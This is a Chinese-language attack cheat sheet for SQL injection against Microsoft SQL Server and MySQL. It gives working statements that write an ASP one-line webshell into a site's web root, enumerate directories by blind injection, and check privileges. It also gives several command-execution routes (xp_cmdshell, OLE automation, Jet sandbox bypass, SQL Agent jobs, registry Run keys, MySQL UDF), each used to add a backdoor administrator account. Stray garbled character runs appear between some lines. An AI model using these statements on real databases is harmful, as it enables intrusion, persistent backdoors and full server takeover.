MSSQL语句导出一句话木马
首先确定网站的 WEB 路径（即 Web 根目录在服务器上的绝对路径，后面用 sp_makewebtask 导出文件时必须写准确）
;create table pcguest(pc char(255));-- //建一个表用于暂存一句话木马内容
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
//将一句话木马插入表中（%3c%25execute request(%22p%22)%25%3e 是 URL 编码后的 <%execute request("p")%>，依赖 Web 服务器在传给数据库前完成 URL 解码；若注入点不经过 URL 解码，则需直接写入明文）
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//将查询结果导出为 ASP 文件（sp_makewebtask 需要 sysadmin 权限，且在较新的 SQL Server 版本中已不存在；输出路径必须是第 1 步确定的 Web 根目录，并且 SQL Server 服务账号对该目录要有写权限）
关于 MSSQL 列目录
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表，三列与 xp_dirtree 带文件标志时的输出列（subdirectory、depth、file）一一对应；文件名超过 100 字符会导致插入报错，必要时加大长度
Insert pctest exec master..xp_dirtree 'd:\app\',1,1 //用 xp_dirtree 列出目录（深度 1，含文件）并把结果导入上面建的表；路径要用单引号，原文的双引号在 QUOTED_IDENTIFIER ON（默认）时会被当作标识符而报错
and (select Count(1) from [pctest]) between 0 and 99 //通过表中的行数（而非字段数）判断目录下有多少文件和子目录，每行对应一项，用区间逐步缩小范围
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二行（先 Top 2 正序、再 Top 1 倒序取到第 2 行）中 file 与 subdirectory 拼接后的长度；改动内层 Top N 即可定位第 N 行
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐位猜解该行值的每个字符（不是字段名）：substring 的第二个参数是字符位置，30~130 覆盖常见可打印 ASCII，命中后再二分缩小
数据库版本和权限查看
and 1=(select @@VERSION) //利用 int 与字符串比较时的类型转换错误把 @@VERSION 回显在报错信息中，前提是页面会显示数据库错误
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //判断当前登录是否属于 sysadmin 服务器角色（是则返回 1，条件为真、页面正常；否则为假）
and 1=(SELECT IS_MEMBER('db_owner'));-- //判断当前用户在当前库中是否为 db_owner
1. 利用 xp_cmdshell 执行命令（需要 sysadmin 权限）
exec master..xp_cmdshell 'net user rfire 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators rfire /add' //命令以 SQL Server 服务账号的身份执行，该账号若不是本地管理员，net user /add 会失败
恢复 xp_cmdshell 存储过程（仅适用于 xp_cmdshell 被 sp_dropextendedproc 删除而 xplog70.dll 仍在磁盘上的情况；在 SQL Server 2005 及以后版本中该过程通常是被配置禁用而不是删除，重新注册 DLL 对此无效）
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2. 利用 SP_OAcreate 和 SP_OAMETHOD 执行命令
适用于 wscript.shell 组件存在、但 xp_cmdshell 和 xplog70.dll 都已被删除的情况（同样需要 sysadmin 权限；SQL Server 2005 及以后版本还要求服务器的 Ole Automation Procedures 选项处于启用状态）
DECLARE @shell INT //声明一个变量用于保存 OLE 对象的句柄
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用该实例的 run 方法执行命令（第三个参数 null 表示不接收返回值）
3. 利用沙盒模式
1 K" S1 ?" z6 X' b9 Y先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。9 a0 g# r5 F4 m- H8 u8 p
修改沙盒模式（把 SandBoxMode 设为 0，即关闭 Jet 对 shell() 这类不安全表达式的限制）:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")'); //ias.mdb 的路径随系统版本不同，需先确认文件存在且 Jet 4.0 provider 可用；较新版本的 SQL Server 还要求允许 Ad Hoc Distributed Queries 才能使用 OpenRowSet
4. 利用 SQL 代理（SQL Server Agent）执行命令
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //用 xp_servicecontrol 启动 SQLSERVERAGENT 服务（服务已在运行时可跳过）
执行命令:
use msdb exec sp_delete_job null,'x' //切换到 msdb 数据库，先删除可能已存在的同名作业 x，避免后面 sp_add_job 因重名报错
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //为作业 x 添加一个 CMDEXEC 类型的步骤，命令以 SQL Server Agent 服务账号的身份执行
exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x' //把作业绑定到本机并启动；原文此处第二条写成 sp_add_job 'x'，会因作业已存在而报错，启动作业应使用 sp_start_job
5. 利用注册表启动项执行命令（用 xp_regwrite 把命令写入 Run 启动项；命令不会立即执行，要等到下一次有用户登录时才触发，并以该登录用户的权限运行）
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add' //原文漏掉了第一个参数 HKEY_LOCAL_MACHINE，且 'shell'.'REG_SZ' 之间应为逗号；参数形式应与第 3 节中的 xp_regwrite 调用一致
6. MySQL 的命令执行
MySQL 的 UDF 自定义函数提权（要求账号对 mysql 库（mysql.func 表）拥有 insert 和 delete 权限，实际上通常意味着 root 或同等高权限账号）
首先通过已有的 webshell（原文为 su.php）把 udf.dll 写到 c:\windows\udf.dll（MySQL 5.1 及以后版本要求 UDF 库位于 plugin_dir 目录下，否则 CREATE FUNCTION 会失败；可先用 show variables like 'plugin_dir' 确认实际路径）
导出后执行创建自定义函数的命令:
Create Function cmdshell returns string soname 'udf.dll' //函数名 cmdshell 必须与 udf.dll 中导出的符号名一致
执行命令:
select cmdshell('net user rfire 123456 /add') //命令以 MySQL 服务进程账号的身份执行
% c8 j) ]$ w* X执行后删除函数 drop function cmdshell8 I, C) X( i1 ^2 B$ _